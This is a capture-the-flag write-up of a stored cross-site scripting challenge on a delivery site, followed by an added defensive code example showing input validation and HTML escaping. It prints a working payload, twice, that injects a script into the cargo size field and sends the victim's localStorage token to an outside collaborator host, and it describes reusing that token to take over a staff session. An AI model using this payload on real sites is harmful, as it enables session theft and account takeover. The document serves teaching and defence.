Galaxy Dash - XSS

Our favorite galaxy delivery site is back!

I spent a lot of time looking for the right answer, and I'm not gonna write down everything that didn't work, but I'm quickly gonna go over the intended path today.

The attack path begins when we confirm a booking.

We need to intercept this traffic and add our payload in the cargo size property. The payload I used was:

<script>fetch('http://collab?token=' + encodeURIComponent(localStorage.getItem('token')));</script>

Now that we have that payload, we just have to make sure someone opens up the message 😉

We do this by requesting support for that delivery.

Once we have clicked that, we can request support for our invoice.

Whenever someone of importance then opens up our invoice, the payload is triggered and we get a response in our collaborator.

When we grab that token and inject it into our localStorage, we can see that we changed our 'company'.

When we now return to BurpSuite and inspect the traffic, we can see our flag in the headers 🇧🇪
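
The defensive side of the bug above, as an added example that is not part of the original write-up or the challenge's code: it assumes the invoice view concatenates the stored cargo size into HTML, and shows input validation and output encoding for that field. The field name `cargoSize` and all function names are assumptions.

```javascript
// Added example, not the challenge's code. Field and function names are assumed.

// Vulnerable pattern assumed from the behaviour in the write-up: the stored
// cargo size is concatenated into the invoice HTML that support staff open.
function renderInvoiceUnsafe(booking) {
  return `<td class="cargo">${booking.cargoSize}</td>`;
}

// Fix 1: validate on input. A cargo size is a quantity, so accept only a
// positive number in a bounded format and reject everything else.
function parseCargoSize(raw) {
  if (typeof raw !== 'string' && typeof raw !== 'number') return null;
  const text = String(raw).trim();
  if (!/^\d{1,6}(\.\d{1,2})?$/.test(text)) return null;
  const value = Number(text);
  return value > 0 ? value : null;
}

// Fix 2: encode on output, so data that slipped past validation
// (or was stored before validation existed) is rendered as text.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function renderInvoiceSafe(booking) {
  return `<td class="cargo">${escapeHtml(booking.cargoSize)}</td>`;
}

// Constructed sample input: the payload from the write-up in the cargo size field.
const sampleBooking = {
  cargoSize: "<script>fetch('http://collab?token=' + encodeURIComponent(localStorage.getItem('token')));</script>",
};

console.log('unsafe:', renderInvoiceUnsafe(sampleBooking));
console.log('safe:  ', renderInvoiceSafe(sampleBooking));
console.log('parsed:', parseCargoSize(sampleBooking.cargoSize));
```

The token was readable by the injected script because it lives in localStorage; a session cookie set with the HttpOnly attribute is not accessible to page script.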
